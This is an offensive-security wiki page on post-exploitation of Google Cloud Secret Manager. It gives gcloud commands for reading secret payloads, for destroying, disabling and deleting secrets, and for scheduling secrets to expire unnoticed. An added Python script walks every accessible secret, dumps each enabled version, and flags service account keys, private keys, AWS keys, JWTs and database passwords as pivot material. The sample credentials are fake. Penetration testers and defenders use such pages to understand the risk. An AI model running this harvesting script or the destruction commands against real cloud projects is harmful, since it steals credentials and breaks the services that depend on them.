GCP - Secretmanager Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
Secretmanager
For more information about Secret Manager check:
{{#ref}}
../gcp-services/gcp-secrets-manager-enum.md
{{#endref}}
secretmanager.versions.access
This permission lets you read the payload (clear-text value) of secret versions. Depending on what is stored (service account keys, API tokens, database passwords, etc.) this alone can be enough to escalate privileges or pivot to other services. It is checked per AccessSecretVersion call: you can read `latest` (or a numbered version) of any secret whose name you already know even without `secretmanager.secrets.list` / `secretmanager.versions.list`, while DISABLED and DESTROYED versions cannot be read at all.
Access secret version
# Get clear-text of version 1 of secret: "<secret name>"
gcloud secrets versions access 1 --secret="<secret_name>"
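Once you hold this permission, the practical next step is to read every version you can reach and triage what came back. The script below is an added example, not HackTricks' or Google's code: it wraps the real `gcloud secrets list`, `gcloud secrets versions list` and `gcloud secrets versions access` commands, skips DISABLED/DESTROYED versions (which cannot be accessed), and tags each payload that looks like a service account key, PEM private key, AWS access key, JWT or database connection string. The signature regexes and the sample listing/payloads at the bottom are constructed assumptions for the demo; run it with `--live` inside an authenticated gcloud session to walk the real project.

```python
"""Enumerate and triage every readable Secret Manager payload via gcloud.

Added example (not part of the original page). The parsing/triage helpers take
the gcloud JSON / payload text as input so they can be exercised offline on the
constructed sample data at the bottom; dump_all() is the live path.
"""
import json
import re
import subprocess
import sys
from typing import Dict, List

# Rough signatures of high-value material. These regexes are an assumption for
# the demo; extend them with whatever your target environment uses.
SIGNATURES = {
    "gcp_service_account_key": re.compile(r'"type"\s*:\s*"service_account"'),
    "private_key_pem": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\b"),
    "db_connection_string": re.compile(
        r"\b(?:postgres(?:ql)?|mysql|mongodb(?:\+srv)?|redis)://[^\s:@/]+:[^\s@/]+@"),
}


def gcloud_json(args: List[str]) -> list:
    """Run a gcloud command with --format=json and parse its output."""
    proc = subprocess.run(["gcloud", *args, "--format=json"],
                          check=True, capture_output=True, text=True)
    return json.loads(proc.stdout or "[]")


def short_name(resource: str) -> str:
    """'projects/p/secrets/db-pass/versions/3' -> '3' (last path segment)."""
    return resource.rstrip("/").rsplit("/", 1)[-1]


def enabled_versions(versions: list) -> List[str]:
    """Keep only ENABLED versions; DISABLED/DESTROYED ones fail on access."""
    return [short_name(v["name"]) for v in versions if v.get("state") == "ENABLED"]


def classify(payload: str) -> List[str]:
    """Return the names of every signature that matches the payload."""
    return [name for name, rx in SIGNATURES.items() if rx.search(payload)]


def access_version(secret: str, version: str) -> str:
    """Read one version's payload (needs secretmanager.versions.access)."""
    proc = subprocess.run(
        ["gcloud", "secrets", "versions", "access", version, f"--secret={secret}"],
        check=True, capture_output=True, text=True)
    return proc.stdout


def dump_all() -> Dict[str, Dict[str, List[str]]]:
    """Walk every secret the caller can list and triage each enabled version.

    Listing needs secretmanager.secrets.list and secretmanager.versions.list;
    with only versions.access, call access_version(name, "latest") directly
    for secret names learned elsewhere (IaC, env references, CI configs).
    """
    report: Dict[str, Dict[str, List[str]]] = {}
    for s in gcloud_json(["secrets", "list"]):
        name = short_name(s["name"])
        for ver in enabled_versions(gcloud_json(["secrets", "versions", "list", name])):
            try:
                payload = access_version(name, ver)
            except subprocess.CalledProcessError as e:
                # No versions.access on this secret, or its state changed meanwhile.
                report.setdefault(name, {})[ver] = [f"error: {e.stderr.strip()}"]
                continue
            report.setdefault(name, {})[ver] = classify(payload) or ["unclassified"]
    return report


# Constructed sample shaped like `gcloud secrets versions list --format=json`.
SAMPLE_VERSIONS = [
    {"name": "projects/123/secrets/db-pass/versions/3", "state": "ENABLED"},
    {"name": "projects/123/secrets/db-pass/versions/2", "state": "DISABLED"},
    {"name": "projects/123/secrets/db-pass/versions/1", "state": "DESTROYED"},
]

# Constructed sample payloads (fake values) to show how the triage behaves.
SAMPLE_PAYLOADS = {
    "sa": '{"type": "service_account", "project_id": "x", '
          '"private_key": "-----BEGIN PRIVATE KEY-----\\nMII..."}',
    "aws": "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
           "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "dsn": "postgres://app:s3cr3t@10.0.0.5:5432/prod",
    "opaque": "k8sTxY1...",
}

if __name__ == "__main__":
    print("enabled versions in sample:", enabled_versions(SAMPLE_VERSIONS))
    for label, text in SAMPLE_PAYLOADS.items():
        print(label, "->", classify(text) or ["unclassified"])
    if "--live" in sys.argv:  # only talk to gcloud when explicitly asked
        print(json.dumps(dump_all(), indent=2))
```

The triage is deliberately cheap (regexes over the payload) because the expensive part is usually deciding which of hundreds of secrets to try first; a service account key or a database DSN found this way is the input to the next pivot, not the end of it.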
secretmanager.versions.destroy
The secretmanager.versions.destroy permission allows an identity to destroy a specific version of a secret (state DESTROYED). The payload is erased and cannot be recovered, so an attacker can wipe critical credentials, cause a denial of service for every workload that consumes that version, or make recovery of sensitive data impossible. If the secret has a version destroy TTL configured, destruction is deferred until the TTL elapses, which leaves defenders a window to notice.
gcloud secrets versions destroy <VERSION> --secret="<SECRET_NAME>" --project=<PROJECTID>
secretmanager.versions.disable
The secretmanager.versions.disable permission allows an identity to disable active secret versions in Secret Manager. Any access to a disabled version fails, so applications that read it (or `latest`, if that alias resolves to it) break until someone holding secretmanager.versions.enable re-enables the version. Unlike destroy, this is reversible and the payload is kept.
gcloud secrets versions disable <VERSION> --secret="<SECRET_NAME>" --project=<PROJECTID>
secretmanager.secrets.delete
The secretmanager.secrets.delete permission allows an identity to delete a secret together with all of its stored versions. The deletion is immediate and irreversible (there is no soft delete in Secret Manager), so the payloads are gone and everything consuming the secret fails until it is recreated and re-populated.
gcloud secrets delete <SECRET_NAME> --project=<PROJECT_ID>
secretmanager.secrets.update
The secretmanager.secrets.update permission allows an identity to modify a secret's metadata and configuration (labels, annotations, rotation schedule and Pub/Sub topics, expiration, version destroy TTL, and similar properties). Besides tampering with rotation, setting an expiration (`--expire-time` or `--ttl`) schedules the whole secret for automatic deletion, a quieter way to destroy it than an explicit `gcloud secrets delete`.
gcloud secrets update SECRET_NAME \
--project=PROJECT_ID \
--clear-labels \
--rotation-period=DURATION